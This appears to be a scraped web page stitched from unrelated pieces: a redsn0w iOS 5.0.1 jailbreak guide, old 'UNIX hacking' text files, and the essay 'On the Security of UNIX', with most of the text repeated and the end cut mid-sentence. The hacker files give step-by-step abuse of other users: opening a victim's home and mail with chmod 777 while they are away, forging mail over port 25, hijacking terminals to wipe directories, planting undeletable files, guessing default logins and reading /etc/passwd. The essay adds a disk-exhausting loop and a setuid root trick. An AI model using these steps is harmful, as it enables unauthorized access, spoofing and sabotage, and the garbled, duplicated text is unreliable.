Redsn0w 0.9.10b1 for Windows (Run in Administrator Mode
Redsn0w 0.9.10b1 for Mac OS X
iOS 5.0.1 ipsw download:
iOS 5.0.1 - iPhone 4 GSM
iOS 5.0.1 - iPhone 4 CDMA
iOS 5.0.1 - iPhone 3GS
iOS 5.0.1 - iPad 1
Supported devices :
iPhone 4 GSM
iPhone 4 CDMA
iPhone 3GS
iPod touch 4G
iPod touch 3G
iPad 1
If you have one of those devices and are not on 5.0.1 yet, update now! The SHSH window is still open for 5.0.1 If you unlock via ultrasn0w or gevey, make sure you only get to 5.0.1 via a custom IPSW! Once you’re at 5.0.1, use the latest redsn0w 0.9.10 to both jailbreak and untether.
If you’re already at 5.0.1 with a tethered jailbreak, you have two choices: either run redsn0w 0.9.10 over your current jailbreak (deselect “Install Cydia” if you do that), or install the Cydia package prepared by the chronic devteam. The patches are the same regardless of which you choose.
Some of you are using a hybrid 5.0/5.0.1 configuration. If so, do not attempt to install this untether over that setup! You will most likely get into a reboot cycle. Do a sync and fresh restore to 5.0.1 then install the jailbreak + untether.
How to jailbreak your iDevice:
Connect your iDevice with your PC via USB, and open iTunes then Restore to iOS 5.0.1 (If you are already running iOS 5.0.1, bypass this step)
Start Redsn0w 0.9.10 b1, and press on "Jailbreak" button
Now select “Install Cydia” and click “Next”.
Now make sure your device is both OFF and PLUGGED IN to the computer before you click “Next”.
At this stage you will be presented with a screen where you will be guided on how to enter DFU mode. Quickly hold “Power” button and then while holding the “Power” button, you will now have to hold “Home” button too. Now after few seconds release “Power” button but keep holding “Home” button until installation begins.
Wait until you get iOS 5.0.1 untethered jailbroken in few minutes.
Downloads:
Redsn0w 0.9.10b1 for Windows (Run in Administrator Mode
Redsn0w 0.9.10b1 for Mac OS X
iOS 5.0.1 ipsw download:
iOS 5.0.1 - iPhone 4 GSM
iOS 5.0.1 - iPhone 4 CDMA
iOS 5.0.1 - iPhone 3GS
iOS 5.0.1 - iPad 1
*** A List Of Some OF The Most Useful UNIX **
*** Hacking Commands, and Some Hints On Their Usage ***
---------------------------------------------------------------
It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:
chown ownername filelist
Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which your are goin to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you cant change nything about it!
---------------------------------------------------------------
Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:
who followed by on or more of the following flags:
-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.
**who -HTu is about the best choice for the average user**
##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###
---------------------------------------------------------------
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
---------------------------------------------------------------
If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:
chmod 777 $HOME
chmod 777 $MAIL
Then clear the screen so they dont see what you just typed.
Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!
---------------------------------------------------------------
Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average user!
type telnet
the following prompt will appear:
telnet>
now type :
open localhost 25
some crap will come up about the mail server..now type:
mail from: xxxxxx Put any name you want.
some more bullshit will come up. Now type:
rcpt to: xxxxxx Put the name of the person to receive mail here.
now type:
data
now you can type the letter...end it with a "."
type quit to exit once you are done.
-------------------------------------------------------------
Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets em every time!
The following script file is an example which will create a
file with the name Ctrl-h. You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****
type the following in vi...
echo'' > 'a^h'
***NOTE...to get the ^h (this really means ctrl-h) from vi type:
Ctrl v
Ctrl h
The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.
*> Title: Tutorial on hacking through a UNIX system
**
In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.
Note: Cosmos is accessed through the Elmos system.
Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).
Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:
Login; (or login;)
password:
When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user.
Common default logins
--------------------------
login; Password:
root root,system,etc..
sys sys,system
daemon daemon
uucp uucp
tty tty
test test
unix unix
bin bin
adm adm
who who
learn learn
uuhost uuhost
nuucp nuucp
If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:
$
%
#
But can be just about anything the sysop or user wants it to be.
Things to do when you are in: Some of the commands that you may want to
try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:
cat /etc/passwd
If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal
The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory
In the Joe login, the last part "/bin/joe " tells us which directory
is his home directory (joe) is. In the "hal" example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.
Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.
On the Security of UNIX
=-=-=-=-=-=-=-=-=-=-=-=
Recently there has been much interest in the security aspects of operating
systems and software.At issue is the ability to prevent undesired disclosure of
information, destruction of information,and harm to the functioning of the
system.This paper discusses the degree of security which can be provided under
the system and offers a number of hints on how to improve security.The first
fact to face is that UNIX was not developed with security,in any realistic
sense,in mind;this fact alone guarantees a vast number of holes.(Actually the
same statement can be made with respect to most systems.)
The area of security in which is theoretically weakest is in protecting against
crashing or at least crippling the operation of the system.The problem here is
not mainly in uncritical acceptance of bad parameters to system calls (there
may be bugs in this area, but none are known)but rather in lack of checks for
excessive consumption of resources.
Most notably, there is no limit on the amount of disk storage used, either in
total space allocated or in the number of files or directories.Here is a
particularly ghastly shell sequence guaranteed to stop the system:
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.In this version of the system,users are prevented from
creating more than a set number of processes simultaneously,so unless users
are in collusion it is unlikely that any one can stop the system altogether.
However, creation of 20 or so CPU or disk-bound jobs leaves few resources
available for others.Also, if many large jobs are run simultaneously,swap space
may run out, causing a panic. It should be evident that excessive consumption
of diskspace, files, swap space and processes can easily occur accidentally in
malfunctioning programs as well as at command level.In fact UNIX is essentially
defenseless against this kind of abuse,nor is there any easy fix.The best that
can be said is that it is generally fairly easy to detect what has happened
when disaster strikes ,to identify the user responsible, and take appropriate
action.In practice,we have found that difficulties in this area are rather
rare,but we have not been faced with malicious users,and enjoy a fairly
generous supply of resources which have served to cushion us against accidental
overconsumption.
The picture is considerably brighter in the area of protection of information
from unauthorized perusal and destruction.Here the degree of security seems
(almost) adequate theoretically, and the problems lie more in the necessity for
care in the actual use of the system.Each UNIX file has associated with it
eleven bits of protection information together with a user identification
number and a user-group identification number (UID and GID).
Nine of the protection bits are used to specify independently permission to
read, to write, and to execute the file to the user himself, to members of the
user's group, and to all other users.Each process generated by or for a user
has associated with it an effective UID and a real UID, and an effective and
real GID.When an attempt is made to access the file for reading, writing, or
executing UID for the process is changed to the UID associated with the file;
the change persists until the process terminates or until the UID changed again
by another execution of a set-UID file.Similarly the effective group ID of a
process is changed to the GID associated with a file when that file is executed
and has the set-GID bit set.The real UID and GID of a process do not change
when any file is executed,but only as the result of a privileged system
call.The basic notion of the set-UID and set-GID bits is that one may write a
program which is executableby others and which maintains files accessible to
others only by that program.
The classical example is the game-playing program which maintains records of
the scores of its players.The program itself has to read and write the score
file,but no one but the game's sponsor can be allowed unrestricted access to
the file lest they manipulate the game to their own advantage.
The solution is to turn on the set-UID bit of the game program. When, and only
when,it is invoked by players of the game,it may update the score file but
ordinary programs executed by others cannot access the score. There are a
number of special cases involved in determining access permissions. Since
executing a directory as a program is a meaningless operation,the
execute-permission bit, for directories, is taken instead to mean permission to
search the directory for a given file during the scanning of a path name; thus
if a directory has execute permission but no read permission for a given user,
he may access files with known names in the directory,but may not read (list)
the entire contents of the directory.
Write permission on a directory is interpreted to mean that the user may create
and delete files in that directory;it is impossible for any user to write
directly into any directory..Another, and from the point of view of security,
much more serious special case is that there is a ``super user'' who is able to
read any file and write any non-directory.The super-user is also able to change
the protection mode and the owner UID and GID of any file and to invoke
privileged system calls.It must be recognized that the mere notion of a
super-user is a theoretical, and usually practical, blemish on any protection
scheme.
The first necessity for a secure system is of course arranging that all files
and directories have the proper protection modes.Traditionally, UNIX software
has been exceedingly permissive in this regard;essentially all commands create
files readable and writable by everyone.In the current version,this policy may
be easily adjusted to suit the needs ofthe installation or the individual user.
Associated with each process and its descendants is a mask, which is in effect
anded with the mode of every file and directory created by that process. In
this way, users can arrange that, by default,all their files are no more
accessible than they wish.The standard mask, set by login,allows all permiss-
ions to the user himself and to his group,but disallows writing by others.
To maintain both data privacy and data integrity,it is necessary, and largely
sufficient,to make one's files inaccessible to others. The lack of sufficiency
could follow from the existence of set-UID programs created by the user and the
possibility of total breach of system security in one of the ways discussed
below(or one of the ways not discussed below).
For greater protection,an encryption scheme is available.Since the editor is
able to create encrypted documents, and the crypt command can be used to pipe
such documents into the other text-processing programs,the length of time
during which clear text versions need be available is strictly limited.The
encryption scheme used is not one of the strongest known, but it is judged
adequate, in the sense that cryptanalysisis likely to require considerably more
effort than more direct methods of reading the encrypted files.For example, a
user who stores data that he regards as truly secret should be aware that he is
implicitly trusting the system administrator not to install a version of the
crypt command that stores every typed password in a file. Needless to say, the
system administrators must be at least as careful as their most demanding user
to place the correct protection mode on the files under their control.
In particular,it is necessary that special files be protected from writing, and
probably reading, by ordinary users when they store sensitive files belonging
to otherusers.It is easy to write programs that examine and change files by
accessing the device on which the files live.
On the issue of password security,UNIX is probably better than most systems.
Passwords are stored in an encrypted form which, in the absence of serious
attention from specialists in the field,appears reasonably secure, provided its
limitations are understood.In the current version, it is based on a slightl y
defective version of the Federal DES;it is purposely defective so that
easily-available hardware is useless for attempts at exhaustive
key-search.Since both the encryption algorithm and the encrypted passwords are
available,exhaustive enumeration of potential passwords is still feasible up to
a point.We have observed that users choose passwords that are easy to
guess:they are short, or from a limited alphabet, or in a dictionary.
Passwords should be at least six characters long and randomly chosen from an
alphabet which includes digits and special characters.
Of course there also exist feasible non-cryptanalytic ways of finding out
passwords.For example: write a program which types out ``login:''on the
typewriter and copies whatever is typed to a file of your own. Then invoke the
command and go away until the victim arrives..The set-UID (set-GID)notion must
be used carefully if any security is to be maintained. The first thing to keep
in mind is that a writable set-UID file can have another program copied onto
it.
For example, if the super-user command is writable,anyone can copy the shell
onto it and get a password-free version of Shell Unix.A more subtle problem can
come from set-UID programs which are not sufficiently careful of what is fed
into them.To take an obsolete example,the previous version of the mail command
was set-UID and owned by the super-user.This version sent mail to the r
ecipient's own directory.The notion was that one should be able to send mail to
anyone even if they want to protecttheir directories from writing. The trouble
was that mailwas rather dumb:anyone could mail someone else's priva te file to
himself.Much more seriousis the following scenario: make a file with a line
like one in the password filewhich allows one to log in as the super-user.Then
make a link named ``.mail'' to the password file in some writable directory on
the same device as the password file (say /tmp). Finally mail the bogus login
line to /tmp/.mail;You can then login as the superuser,clean up the
incriminating evidence,and have your will.
The fact that users can mount their own disks and tapes as file systems can be
another way of gaining super-user status.Once a disk pack is mounted, the
system believes what is on it.Thus one can take a blank disk pack,put on it
anything desired,and mount it.There are obvious and unfortunate consequences.
For example:a mounted disk with garbage on it will crash the system;one of the
files on the mounted disk can easily be a password-free version of Shell Unix;
other files can be unprotected entries for special files. The only easy fix
for this problem is to forbid the use of mount to unpriv- ileged users.A
partial solution, not so restrictive,would be to have the mount command examine
the special file for bad data,set-UID programs owned by others ,and accessible
special files,and balk at unprivileged invokers.
Scott Walters London, CANADA
walterss@julian.uwo.ca
PGP 31 03 1B E1 C7 6E 3A EC 97 32 01 BA 5B 05 5D FB
finger me for public key block
MIME-mail welcome
'Beware the fury of a patient man.'
---------------------------------------------------------------
It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:
chown ownername filelist
Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which your are goin to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you cant change nything about it!
---------------------------------------------------------------
Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:
who followed by on or more of the following flags:
-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.
**who -HTu is about the best choice for the average user**
##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###
---------------------------------------------------------------
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
---------------------------------------------------------------
If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:
chmod 777 $HOME
chmod 777 $MAIL
Then clear the screen so they dont see what you just typed.
Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!
---------------------------------------------------------------
Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average user!
type telnet
the following prompt will appear:
telnet>
now type :
open localhost 25
some crap will come up about the mail server..now type:
mail from: xxxxxx Put any name you want.
some more bullshit will come up. Now type:
rcpt to: xxxxxx Put the name of the person to receive mail here.
now type:
data
now you can type the letter...end it with a "."
type quit to exit once you are done.
-------------------------------------------------------------
Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets em every time!
The following script file is an example which will create a
file with the name Ctrl-h. You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****
type the following in vi...
echo'' > 'a^h'
***NOTE...to get the ^h (this really means ctrl-h) from vi type:
Ctrl v
Ctrl h
The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.
*> Title: Tutorial on hacking through a UNIX system
**
In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.
Note: Cosmos is accessed through the Elmos system.
Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).
Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:
Login; (or login;)
password:
When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user.
Common default logins
--------------------------
login; Password:
root root,system,etc..
sys sys,system
daemon daemon
uucp uucp
tty tty
test test
unix unix
bin bin
adm adm
who who
learn learn
uuhost uuhost
nuucp nuucp
If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:
$
%
#
But can be just about anything the sysop or user wants it to be.
Things to do when you are in: Some of the commands that you may want to
try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:
cat /etc/passwd
If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal
The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory
In the Joe login, the last part "/bin/joe " tells us which directory
is his home directory (joe) is. In the "hal" example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.
Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.
On the Security of UNIX
=-=-=-=-=-=-=-=-=-=-=-=
Recently there has been much interest in the security aspects of operating
systems and software.At issue is the ability to prevent undesired disclosure of
information, destruction of information,and harm to the functioning of the
system.This paper discusses the degree of security which can be provided under
the system and offers a number of hints on how to improve security.The first
fact to face is that UNIX was not developed with security,in any realistic
sense,in mind;this fact alone guarantees a vast number of holes.(Actually the
same statement can be made with respect to most systems.)
The area of security in which is theoretically weakest is in protecting against
crashing or at least crippling the operation of the system.The problem here is
not mainly in uncritical acceptance of bad parameters to system calls (there
may be bugs in this area, but none are known)but rather in lack of checks for
excessive consumption of resources.
Most notably, there is no limit on the amount of disk storage used, either in
total space allocated or in the number of files or directories.Here is a
particularly ghastly shell sequence guaranteed to stop the system:
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.In this version of the system,users are prevented from
creating more than a set number of processes simultaneously,so unless users
are in collusion it is unlikely that any one can stop the system altogether.
However, creation of 20 or so CPU or disk-bound jobs leaves few resources
available for others.Also, if many large jobs are run simultaneously,swap space
may run out, causing a panic. It should be evident that excessive consumption
of diskspace, files, swap space and processes can easily occur accidentally in
malfunctioning programs as well as at command level.In fact UNIX is essentially
defenseless against this kind of abuse,nor is there any easy fix.The best that
can be said is that it is generally fairly easy to detect what has happened
when disaster strikes ,to identify the user responsible, and take appropriate
action.In practice,we have found that difficulties in this area are rather
rare,but we have not been faced with malicious users,and enjoy a fairly
generous supply of resources which have served to cushion us against accidental
overconsumption.
The picture is considerably brighter in the area of protection of information
from unauthorized perusal and destruction.Here the degree of security seems
(almost) adequate theoretically, and the problems lie more in the necessity for
care in the actual use of the system.Each UNIX file has associated with it
eleven bits of protection information together with a user identification
number and a user-group identification number (UID and GID).
Nine of the protection bits are used to specify independently permission to
read, to write, and to execute the file to the user himself, to members of the
user's group, and to all other users.Each process generated by or for a user
has associated with it an effective UID and a real UID, and an effective and
real GID.When an attempt is made to access the file for reading, writing, or
executing UID for the process is changed to the UID associated with the file;
the change persists until the process terminates or until the UID changed again
by another execution of a set-UID file.Similarly the effective group ID of a
process is changed to the GID associated with a file when that file is executed
and has the set-GID bit set.The real UID and GID of a process do not change
when any file is executed,but only as the result of a privileged system
call.The basic notion of the set-UID and set-GID bits is that one may write a
program which is executableby others and which maintains files accessible to
others only by that program.
The classical example is the game-playing program which maintains records of
the scores of its players.The program itself has to read and write the score
file,but no one but the game's sponsor can be allowed unrestricted access to
the file lest they manipulate the game to their own advantage.
The solution is to turn on the set-UID bit of the game program. When, and only
when,it is invoked by players of the game,it may update the score file but
ordinary programs executed by others cannot access the score. There are a
number of special cases involved in determining access permissions. Since
executing a directory as a program is a meaningless operation,the
execute-permission bit, for directories, is taken instead to mean permission to
search the directory for a given file during the scanning of a path name; thus
if a directory has execute permission but no read permission for a given user,
he may access files with known names in the directory,but may not read (list)
the entire contents of the directory.
Write permission on a directory is interpreted to mean that the user may create
and delete files in that directory;it is impossible for any user to write
directly into any directory..Another, and from the point of view of security,
much more serious special case is that there is a ``super user'' who is able to
read any file and write any non-directory.The super-user is also able to change
the protection mode and the owner UID and GID of any file and to invoke
privileged system calls.It must be recognized that the mere notion of a
super-user is a theoretical, and usually practical, blemish on any protection
scheme.
The first necessity for a secure system is of course arranging that all files
and directories have the proper protection modes.Traditionally, UNIX software
has been exceedingly permissive in this regard;essentially all commands create
files readable and writable by everyone.In the current version,this policy may
be easily adjusted to suit the needs ofthe installation or the individual user.
Associated with each process and its descendants is a mask, which is in effect
anded with the mode of every file and directory created by that process. In
this way, users can arrange that, by default,all their files are no more
accessible than they wish.The standard mask, set by login,allows all permiss-
ions to the user himself and to his group,but disallows writing by others.
To maintain both data privacy and data integrity,it is necessary, and largely
sufficient,to make one's files inaccessible to others. The lack of sufficiency
could follow from the existence of set-UID programs created by the user and the
possibility of total breach of system security in one of the ways discussed
below(or one of the ways not discussed below).
For greater protection,an encryption scheme is available.Since the editor is
able to create encrypted documents, and the crypt command can be used to pipe
such documents into the other text-processing programs,the length of time
during which clear text versions need be available is strictly limited.The
encryption scheme used is not one of the strongest known, but it is judged
adequate, in the sense that cryptanalysisis likely to require considerably more
effort than more direct methods of reading the encrypted files.For example, a
user who stores data that he regards as truly secret should be aware that he is
implicitly trusting the system administrator not to install a version of the
crypt command that stores every typed password in a file. Needless to say, the
system administrators must be at least as careful as their most demanding user
to place the correct protection mode on the files under their control.
In particular,it is necessary that special files be protected from writing, and
probably reading, by ordinary users when they store sensitive files belonging
to otherusers.It is easy to write programs that examine and change files by
accessing the device on which the files live.
On the issue of password security,UNIX is probably better than most systems.
Passwords are stored in an encrypted form which, in the absence of serious
attention from specialists in the field,appears reasonably secure, provided its
limitations are understood.In the current version, it is based on a slightl y
defective version of the Federal DES;it is purposely defective so that
easily-available hardware is useless for attempts at exhaustive
key-search.Since both the encryption algorithm and the encrypted passwords are
available,exhaustive enumeration of potential passwords is still feasible up to
a point.We have observed that users choose passwords that are easy to
guess:they are short, or from a limited alphabet, or in a dictionary.
Passwords should be at least six characters long and randomly chosen from an
alphabet which includes digits and special characters.
Of course there also exist feasible non-cryptanalytic ways of finding out
passwords.For example: write a program which types out ``login:''on the
typewriter and copies whatever is typed to a file of your own. Then invoke the
command and go away until the victim arrives..The set-UID (set-GID)notion must
be used carefully if any security is to be maintained. The first thing to keep
in mind is that a writable set-UID file can have another program copied onto
it.
For example, if the super-user command is writable,anyone can copy the shell
onto it and get a password-free version of Shell Unix.A more subtle problem can
come from set-UID programs which are not sufficiently careful of what is fed
into them.To take an obsolete example,the previous version of the mail command
was set-UID and owned by the super-user.This version sent mail to the r
ecipient's own directory.The notion was that one should be able to send mail to
anyone even if they want to protecttheir directories from writing. The trouble
was that mailwas rather dumb:anyone could mail someone else's priva te file to
himself.Much more seriousis the following scenario: make a file with a line
like one in the password filewhich allows one to log in as the super-user.Then
make a link named ``.mail'' to the password file in some writable directory on
the same device as the password file (say /tmp). Finally mail the bogus login
line to /tmp/.mail;You can then login as the superuser,clean up the
incriminating evidence,and have your will.
The fact that users can mount their own disks and tapes as file systems can be
another way of gaining super-user status.Once a disk pack is mounted, the
system believes what is on it.Thus one can take a blank disk pack,put on it
anything desired,and mount it.There are obvious and unfortunate consequences.
For example:a mounted disk with garbage on it will crash the system;one of the
files on the mounted disk can easily be a password-free version of Shell Unix;
other files can be unprotected entries for special files. The only easy fix
for this problem is to forbid the use of mount to unpriv- ileged users.A
partial solution, not so restrictive,would be to have the mount command examine
